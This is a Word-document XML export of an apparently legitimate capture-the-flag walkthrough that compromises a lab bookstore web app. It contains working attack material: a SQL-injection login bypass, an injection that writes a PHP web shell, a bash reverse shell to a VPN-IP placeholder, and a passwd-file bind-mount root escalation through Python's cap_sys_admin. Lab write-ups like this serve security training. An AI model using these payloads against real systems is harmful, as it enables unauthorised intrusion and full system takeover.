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30j0zll"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Library</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pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5ylu7zjqg807"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p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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it is necessary to discover the running services and identify accessible ports. To accomplish this task, we will use Nmap, a tool specialized in network mapping and service analysis.</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sudo nmap -p- -sCV -Pn 172.16.15.140 --min-rate 300</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986776" cy="2233660"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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986776" cy="223366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the scan completed, we identified that only one web port was open: port 80.</w:t>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F">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675709" cy="1717405"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="47" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="10108" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4675709" cy="171740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several unsuccessful login attempts using default credentials such as admin:admin, guest:guest, etc., we performed a bypass using the following SQLi payload: "admin' or 1=1-- -", With this, we successfully authenticated into the application.</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2">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360402"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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572000" cy="136040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this is an online bookstore where users can purchase books. An intriguing feature is the presence of a search field that allows us to look for books. Given this, the first consideration is the possibility of SQL injection, especially after bypassing the login screen. The first task is to identify the number of columns.</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quickly discovered that there are 5 columns, and column 2 was reflected:</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264945"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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572000" cy="226494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the database version:</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301301"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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572000" cy="230130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confirming the SQL injection, the next step is to obtain a shell. To achieve this, it is necessary to determine whether we have write permissions in the application's document root or another directory. After unsuccessful attempts to write a web shell in the document root, we decided to perform fuzzing, which revealed the "assets" directory. Writing a web shell in this directory was successful.</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023443"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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72000" cy="202344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'union select 1,"&lt;?php system($GET[0]);?&gt;",3,4,5 INTO outfile "/var/www/html/assets/wshell.php"--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353644"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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72000" cy="135364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observe that the web shell was successfully created on the server.</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730180"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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572000" cy="17301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passing the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command in the URL, we observe that the server returns the command output.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:jc w:val="cente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487077"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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572000" cy="148707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RCE on the server, the next step is to establish a reverse shell. For this, we can use the following payload. However, it is crucial to </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">URL encode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> it before use (replace &lt;IP_VPN&gt; with your VPN IP).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/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;IP_VPN&gt;/4444 0&gt;&amp;1' </w:t>
      </w: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nc -lvnp 4444</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339178"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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572000" cy="13391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Encoded payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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203947"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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572000" cy="12039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295975"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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572000" cy="12959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shell:</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574341"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="58" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="54662" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="57434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For better terminal handling, we upgrade it to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">full TTY:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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111280"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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572000" cy="11112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retrieve the first user flag:</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717051"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="6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572000" cy="271705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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.d96ml9b4zbkk" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>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retrieve the final flag. For this, we must escalate to the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using a single command, it is possible to enumerate enabled </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">capabilities</w:t>
        </w:r>
      </w:hyperlink>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4E">
      <w:pPr>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getcap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2&gt;/dev/null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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identify that Python has the capability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capsysadmin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2">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3416270" cy="793780"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="62" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="40541" l="0" r="44583" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3416270" cy="7937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the article “</w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Exploiting Linux Capabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”, we can create a new user with the same privileges as root by manipulating the passwd file.</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passwd -1 password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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8">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3220700" cy="658779"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="63" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="63088" l="0" r="59124" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3220700" cy="6587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copy the passwd file to the /tmp directory and then add a new user with root-level privileges, using the previously defined password.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cp /etc/passwd .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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printf 'pretty:$1$dFo2Prg5$pLfaDs2OJd0toE787NT0w.:0:0:root/root:/bin/bash\n' &gt;&gt; passwd</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0">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5698491" cy="671018"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="64" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="54508" l="0" r="12241" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5698491" cy="67101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2">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3810000" cy="2591527"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="65" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="14489" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3810000" cy="259152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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the following exploit, we bind-mount our modified passwd file:</w:t>
      </w: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libc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CDLL(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"libc.so.6"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libc.mount.argtypes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c_ulong,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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">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MS_BIND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4096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defined in /usr/include/sys/mount.h:55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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/home/student/passwd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/etc/passwd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filesystemtype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none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mountflags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MS_BIND</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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libc.mount(source,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filesystemtype,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mountflags,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Once this process is complete, we simply authenticate with our new user using the password 'password'. With this, we gain access to the final flag located in the /root directory.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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="846375"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="66" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="41922" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="8463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widowControl w:val="0"/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025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5">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.3znysh7"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-866771</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="53"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6">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7">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark2"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0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="60"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5768658</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3006154"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="44"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Library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5768658</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3006154"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="44"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77025" cy="3006154"/>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9.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId24"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1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.thehacker.recipes/infra/privilege-escalation/unix/capabilities" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tbhaxor.com/exploiting-linux-capabilities-part-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hyperlink" Target="https://app.hackingclub.com/training/training-machines/153"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9.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><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22.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://urlencod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nY1GkBni/Y8oXXvKMcxiqSqgg==">CgMxLjAyCGguZ2pkZ3hzMgloLjMwajB6bGwyDmguNXlsdTd6anFnODA3Mg5oLmQ5Nm1sOWI0emJrazIJaC4zem55c2g3OAByITFRSFRHVW5KV1pIbmVJam0xR1luQ09OU2hwVTFmRVhPVQ==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